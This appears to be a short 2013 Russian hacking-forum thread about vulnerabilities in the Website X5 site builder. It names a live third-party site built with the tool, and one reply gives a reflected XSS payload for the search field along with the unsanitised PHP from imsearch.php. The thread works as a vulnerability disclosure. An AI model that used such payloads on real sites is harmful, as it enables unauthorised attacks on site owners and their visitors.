Уязвимости в Website x5

Discussion in 'Песочница' started by Darth Padla, 10 Jan 2013.

  1. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    Кто-нибудь знает что-нибудь про это?
    http://www.websitex5.com/
    http://www.websitexs.ru/

    пример сайта - http://islam44.com/
     
  2. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    XSS:
    В поле поиска на сайте вбейте "><script>alert(111)</script>
    Уязвимый кусок кода imsearch.php:
    PHP:
    if ($_POST['search'] != "") {
      
    $search = new imSearch();
      
    $search->search($_POST['search']);
    }
    Пример:
     
    #2 cat1vo, 10 Jan 2013
    Last edited: 10 Jan 2013
Loading...
Similar Threads - Уязвимости Website
  1. zase
    Replies:
    1
    Views:
    3,764
  2. Shadows_God
    Replies:
    14
    Views:
    8,897